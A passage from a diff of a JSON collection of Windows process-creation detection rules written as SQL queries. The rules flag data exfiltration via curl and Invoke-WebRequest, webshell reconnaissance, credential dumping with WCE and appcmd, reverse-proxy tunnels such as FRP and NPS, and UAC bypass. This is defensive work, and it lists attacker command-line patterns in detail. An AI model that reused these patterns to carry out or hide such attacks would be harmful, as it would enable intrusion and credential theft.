'\\')))" ], - "filename": "proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml" + "filename": "proc_creation_win_hktl_impacket_tools.yml" }, { - "title": "Potential Data Exfiltration Activity Via CommandLine Tools", - "id": "7d1aaf3d-4304-425c-b7c3-162055e0b3ab", + "title": "Webshell Detection With Command Line Keywords", + "id": "bed2a484-9348-4143-8a8a-b801c979301c", "status": "experimental", - "description": "Detects the use of various CLI utilities exfiltrating data via web requests", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects certain command line parameters often used during reconnaissance activity via web shells", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\') AND CommandLine LIKE '% -ur%' ESCAPE '\\' AND CommandLine LIKE '% -me%' ESCAPE '\\' AND CommandLine LIKE '% -b%' ESCAPE '\\' AND CommandLine LIKE '% POST %' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--ur%' ESCAPE '\\' AND (CommandLine LIKE '% -d %' ESCAPE '\\' OR CommandLine LIKE '% --data %' ESCAPE '\\'))) AND ((CommandLine LIKE '%ToBase64String%' ESCAPE '\\' OR CommandLine LIKE '%whoami%' ESCAPE '\\' OR CommandLine LIKE '%nltest%' ESCAPE '\\' OR CommandLine LIKE '%ifconfig%' ESCAPE '\\' OR CommandLine LIKE '%hostname%' ESCAPE '\\' OR CommandLine LIKE '%net view%' ESCAPE '\\' OR CommandLine LIKE '%qprocess%' ESCAPE '\\' OR CommandLine LIKE '%netstat%' ESCAPE '\\' OR CommandLine LIKE '%systeminfo%' ESCAPE '\\' OR CommandLine LIKE '%tasklist%' ESCAPE '\\' OR CommandLine LIKE '%sc query%' ESCAPE '\\') OR (CommandLine LIKE '%type %' ESCAPE '\\' AND CommandLine LIKE '% > %' ESCAPE '\\' AND CommandLine LIKE '% C:\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((OriginalFileName IN ('net.exe', 'net1.exe') AND (CommandLine LIKE '% user %' ESCAPE '\\' OR CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% group %' ESCAPE '\\')) OR (OriginalFileName = 'ping.exe' AND CommandLine LIKE '% -n %' ESCAPE '\\') OR (CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%cd /d %' ESCAPE '\\') OR (OriginalFileName = 'wmic.exe' AND CommandLine LIKE '% /node:%' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\quser.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pathping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tracert.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tasklist.exe' ESCAPE '\\') OR OriginalFileName IN ('whoami.exe', 'sysinfo.exe', 'quser.exe', 'ipconfig.exe', 'pathping.exe', 'tracert.exe', 'netstat.exe', 'schtasks.exe', 'VSSADMIN.EXE', 'wevtutil.exe', 'tasklist.exe')) OR (CommandLine LIKE '% Test-NetConnection %' ESCAPE '\\' OR CommandLine LIKE '%dir \\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_susp_data_exfiltration_via_cli.yml" + "filename": "proc_creation_win_webshell_detection.yml" }, { - "title": "MpiExec Lolbin", - "id": "729ce0ea-5d8f-4769-9762-e35de441586d", + "title": "PUA - AdFind Suspicious Execution", + "id": "9a132afa-654e-11eb-ae93-0242ac130002", "status": "test", - "description": "Detects a certain command line flag combination used by mpiexec.exe LOLBIN from HPC pack that can be used to execute any other binary", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects AdFind execution with common flags seen used during attacks", + "author": "Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218" + "attack.discovery", + "attack.t1018", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.002" ], "falsepositives": [ - "Unknown" + "Legitimate admin activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mpiexec.exe' ESCAPE '\\' OR Imphash = 'd8b52ef6aaa3a81501bdfff9dbb96217' OR Hashes LIKE '%IMPHASH=d8b52ef6aaa3a81501bdfff9dbb96217%' ESCAPE '\\') AND (CommandLine LIKE '% /n 1 %' ESCAPE '\\' OR CommandLine LIKE '% -n 1 %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_mpiexec.yml" + "filename": "proc_creation_win_pua_adfind_susp_usage.yml" }, { - "title": "Potential Privilege Escalation via Service Permissions Weakness", - "id": "0f9c21f1-6a73-4b0e-9809-cb562cb8d981", - "status": "test", - "description": "Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level", - "author": "Teymur Kheirkhabarov", + "title": "Port Forwarding Attempt Via SSH", + "id": "327f48c1-a6db-4eb8-875a-f6981f1b0183", + "status": "experimental", + "description": "Detects suspicious SSH tunnel port forwarding to a local port", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1574.011" + "attack.command_and_control", + "attack.lateral_movement", + "attack.t1572", + "attack.t1021.001", + "attack.t1021.004" ], "falsepositives": [ - "Unknown" + "Administrative activity using a remote port forwarding to a local port" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%services%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ServiceDll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')" ], - "filename": "proc_creation_win_registry_privilege_escalation_via_service_key.yml" + "filename": "proc_creation_win_ssh_port_forward.yml" }, { - "title": "Devtoolslauncher.exe Executes Specified Binary", - "id": "cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", - "status": "test", - "description": "The Devtoolslauncher.exe executes other binary", - "author": "Beyu Denis, oscd.community (rule), @_felamos (idea)", + "title": "PUA - Fast Reverse Proxy (FRP) Execution", + "id": "32410e29-5f94-4568-b6a3-d91a8adad863", + "status": "experimental", + "description": "Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.", + "author": "frack113, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.command_and_control", + "attack.t1090" ], "falsepositives": [ - "Legitimate use of devtoolslauncher.exe by legitimate user" + "Legitimate use" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\devtoolslauncher.exe' ESCAPE '\\' AND CommandLine LIKE '%LaunchForDeploy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\frpc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\frps.exe' ESCAPE '\\') OR CommandLine LIKE '%\\\\frpc.ini%' ESCAPE '\\' OR (Hashes LIKE '%MD5=7D9C233B8C9E3F0EA290D2B84593C842%' ESCAPE '\\' OR Hashes LIKE '%SHA1=06DDC9280E1F1810677935A2477012960905942F%' ESCAPE '\\' OR Hashes LIKE '%SHA256=57B0936B8D336D8E981C169466A15A5FD21A7D5A2C7DAF62D5E142EE860E387C%' ESCAPE '\\') OR md5 = '7d9c233b8c9e3f0ea290d2b84593c842' OR sha1 = '06ddc9280e1f1810677935a2477012960905942f' OR sha256 = '57b0936b8d336d8e981c169466a15a5fd21a7d5a2c7daf62d5e142ee860e387c'))" ], - "filename": "proc_creation_win_lolbin_devtoolslauncher.yml" + "filename": "proc_creation_win_pua_frp.yml" }, { - "title": "Abuse of Service Permissions to Hide Services Via Set-Service", - "id": "514e4c3a-c77d-4cde-a00f-046425e2301e", + "title": "Microsoft IIS Service Account Password Dumped", + "id": "2d3cdeec-c0db-45b4-aa86-082f7eb75701", "status": "experimental", - "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. (Works only in powershell 7)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords", + "author": "Tim Rauch, Janantha Marasinghe", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.credential_access", + "attack.t1003" ], "falsepositives": [ - "Rare intended use of hidden services" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR OriginalFileName = 'pwsh.dll') AND (CommandLine LIKE '%Set-Service %' ESCAPE '\\' AND CommandLine LIKE '%DCLCWPDTSD%' ESCAPE '\\') AND (CommandLine LIKE '%-SecurityDescriptorSddl %' ESCAPE '\\' OR CommandLine LIKE '%-sd %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\appcmd.exe' ESCAPE '\\' OR OriginalFileName = 'appcmd.exe') AND CommandLine LIKE '%list %' ESCAPE '\\') AND ((CommandLine LIKE '% /config%' ESCAPE '\\' OR CommandLine LIKE '% /xml%' ESCAPE '\\' OR CommandLine LIKE '% -config%' ESCAPE '\\' OR CommandLine LIKE '% -xml%' ESCAPE '\\') OR ((CommandLine LIKE '% /@t%' ESCAPE '\\' OR CommandLine LIKE '% /text%' ESCAPE '\\' OR CommandLine LIKE '% /show%' ESCAPE '\\' OR CommandLine LIKE '% -@t%' ESCAPE '\\' OR CommandLine LIKE '% -text%' ESCAPE '\\' OR CommandLine LIKE '% -show%' ESCAPE '\\') AND (CommandLine LIKE '%:\\*' ESCAPE '\\' OR CommandLine LIKE '%password%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_hide_services_via_set_service.yml" + "filename": "proc_creation_win_iis_appcmd_service_account_password_dumped.yml" }, { - "title": "PUA - 3Proxy Execution", - "id": "f38a82d2-fba3-4781-b549-525efbec8506", + "title": "UEFI Persistence Via Wpbbin - ProcessCreation", + "id": "4abc0ec4-db5a-412f-9632-26659cddf145", "status": "experimental", - "description": "Detects the use of 3proxy, a tiny free proxy server", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects execution of the binary \"wpbbin\" which is used as part of the UEFI based persistence method described in the reference section", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.persistence", + "attack.defense_evasion", + "attack.t1542.001" ], "falsepositives": [ - "Administrative activity" + "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\3proxy.exe' ESCAPE '\\' OR Description = '3proxy - tiny proxy server' OR CommandLine LIKE '%.exe -i127.0.0.1 -p%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wpbbin.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_3proxy_execution.yml" + "filename": "proc_creation_win_wpbbin_potential_persistence.yml" }, { - "title": "UAC Bypass Using Event Viewer RecentViews", - "id": "30fc8de7-d833-40c4-96b6-28319fbc4f6c", + "title": "Proxy Execution via Wuauclt", + "id": "af77cf95-c469-471c-b6a0-946c685c4798", "status": "test", - "description": "Detects the pattern of UAC Bypass using Event Viewer RecentViews", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), Florian Roth (Nextron Systems), Sreeman, FPT.EagleEye Team", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation" + "attack.t1218", + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%\\\\Event Viewer\\\\RecentViews%' ESCAPE '\\' OR CommandLine LIKE '%\\\\EventV~1\\\\RecentViews%' ESCAPE '\\') AND CommandLine LIKE '%>%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%RunHandlerComServer%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /UpdateDeploymentProvider UpdateDeploymentProvider.dll %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_eventvwr_recentviews.yml" + "filename": "proc_creation_win_lolbin_wuauclt.yml" }, { - "title": "Winnti Malware HK University Campaign", - "id": "3121461b-5aa0-4a41-b910-66d25524edbb", - "status": "test", - "description": "Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities", - "author": "Florian Roth (Nextron Systems), Markus Neis", + "title": "Renamed Office Binary Execution", + "id": "0b0cd537-fc77-4e6e-a973-e53495c1083d", + "status": "experimental", + "description": "Detects the execution of a renamed office binary", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1574.002", - "attack.g0044" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\hpqhvind.exe%' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\Test.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\ProgramData\\\\DRM\\\\CLR\\\\CLR.exe' ESCAPE '\\' OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\DRM\\\\Windows%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName IN ('Excel.exe', 'MSACCESS.EXE', 'OneNote.exe', 'POWERPNT.EXE', 'WinWord.exe') OR Description IN ('Microsoft Access', 'Microsoft Excel', 'Microsoft OneNote', 'Microsoft PowerPoint', 'Microsoft Word')) AND NOT ((NewProcessName LIKE '%\\\\EXCEL.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\MSACCESS.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\POWERPNT.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_winnti_mal_hk_jan20.yml" + "filename": "proc_creation_win_renamed_office_processes.yml" }, { - "title": "Remote Access Tool - Anydesk Execution From Suspicious Folder", - "id": "065b00ca-5d5c-4557-ac95-64a6d0b64d86", - "status": "experimental", - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "author": "Florian Roth (Nextron Systems)", + "title": "Execution via stordiag.exe", + "id": "961e0abb-1b1e-4c84-a453-aafe56ad0d34", + "status": "test", + "description": "Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe", + "author": "Austin Songer (@austinsonger)", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate use of AnyDesk from a non-standard folder" + "Legitimate usage of stordiag.exe." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\AnyDesk.exe' ESCAPE '\\' OR Description = 'AnyDesk' OR Product = 'AnyDesk' OR Company = 'AnyDesk Software GmbH') AND NOT ((NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%Program Files (x86)\\\\AnyDesk%' ESCAPE '\\' OR NewProcessName LIKE '%Program Files\\\\AnyDesk%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\stordiag.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fltmc.exe' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'c:\\\\windows\\\\system32\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'c:\\\\windows\\\\syswow64\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_remote_access_tools_anydesk_susp_exec.yml" + "filename": "proc_creation_win_stordiag_susp_child_process.yml" }, { - "title": "Suspicious RDP Redirect Using TSCON", - "id": "f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb", + "title": "Script Interpreter Execution From Suspicious Folder", + "id": "1228c958-e64e-4e71-92ad-7d429f4138ba", "status": "test", - "description": "Detects a suspicious RDP session redirect using tscon.exe", + "description": "Detects a suspicious script executions in temporary folders or folders accessible by environment variables", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1563.002", - "attack.t1021.001", - "car.2013-07-002" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '% /dest:rdp-tcp:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass %' ESCAPE '\\' OR CommandLine LIKE '%/e:vbscript %' ESCAPE '\\' OR CommandLine LIKE '%/e:javascript %' ESCAPE '\\') OR OriginalFileName IN ('powershell.exe', 'pwsh.dll', 'mshta.exe', 'wscript.exe', 'cscript.exe', 'cmd.exe')) AND (NewProcessName LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_tscon_rdp_redirect.yml" + "filename": "proc_creation_win_susp_script_exec_from_env_folder.yml" }, { - "title": "PUA - NPS Tunneling Tool Execution", - "id": "68d37776-61db-42f5-bf54-27e87072d17e", - "status": "experimental", - "description": "Detects the use of NPS, a port forwarding and intranet penetration proxy server", + "title": "HackTool - Windows Credential Editor (WCE) Execution", + "id": "7aa7009a-28b9-4344-8c1f-159489a390df", + "status": "test", + "description": "Detects the use of Windows Credential Editor (WCE)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090" + "attack.credential_access", + "attack.t1003.001", + "attack.s0005" ], "falsepositives": [ - "Legitimate use" + "Another service that uses a single -s command line switch" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\npc.exe' ESCAPE '\\' OR (CommandLine LIKE '% -server=%' ESCAPE '\\' AND CommandLine LIKE '% -vkey=%' ESCAPE '\\' AND CommandLine LIKE '% -password=%' ESCAPE '\\') OR CommandLine LIKE '% -config=npc%' ESCAPE '\\' OR ((Hashes LIKE '%MD5=AE8ACF66BFE3A44148964048B826D005%' ESCAPE '\\' OR Hashes LIKE '%SHA1=CEA49E9B9B67F3A13AD0BE1C2655293EA3C18181%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5A456283392FFCEEEACA3D3426C306EB470304637520D72FED1CC1FEBBBD6856%' ESCAPE '\\') OR md5 = 'ae8acf66bfe3a44148964048b826d005' OR sha1 = 'cea49e9b9b67f3a13ad0be1c2655293ea3c18181' OR sha256 = '5a456283392ffceeeaca3d3426c306eb470304637520d72fed1cc1febbbd6856')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((Imphash IN ('a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2') OR (Hashes LIKE '%IMPHASH=a53a02b997935fd8eedcb5f7abab9b9f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=e96a73c7bf33a464c510ede582318bf2%' ESCAPE '\\')) OR (CommandLine LIKE '%.exe -S' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\clussvc.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_nps.yml" + "filename": "proc_creation_win_hktl_wce.yml" }, { - "title": "Suspicious Modification Of Scheduled Tasks", - "id": "1c0e41cd-21bb-4433-9acc-4a2cd6367b9b", - "status": "experimental", - "description": "Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location\nAttackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on\nInstead they modify the task after creation to include their malicious payload\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Turla Group Lateral Movement", + "id": "c601f20d-570a-4cde-a7d6-e17f99cb8e7f", + "status": "test", + "description": "Detects automated lateral movement by Turla group", + "author": "Markus Neis", "tags": [ + "attack.g0010", "attack.execution", - "attack.t1053.005" + "attack.t1059", + "attack.lateral_movement", + "attack.t1021.002", + "attack.discovery", + "attack.t1083", + "attack.t1135" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /Change %' ESCAPE '\\' AND CommandLine LIKE '% /TN %' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\') AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%bash.exe%' ESCAPE '\\' OR CommandLine LIKE '%bash %' ESCAPE '\\' OR CommandLine LIKE '%scrcons%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%forfiles%' ESCAPE '\\' OR CommandLine LIKE '%scriptrunner%' ESCAPE '\\' OR CommandLine LIKE '%hh.exe%' ESCAPE '\\' OR CommandLine LIKE '%hh %' ESCAPE 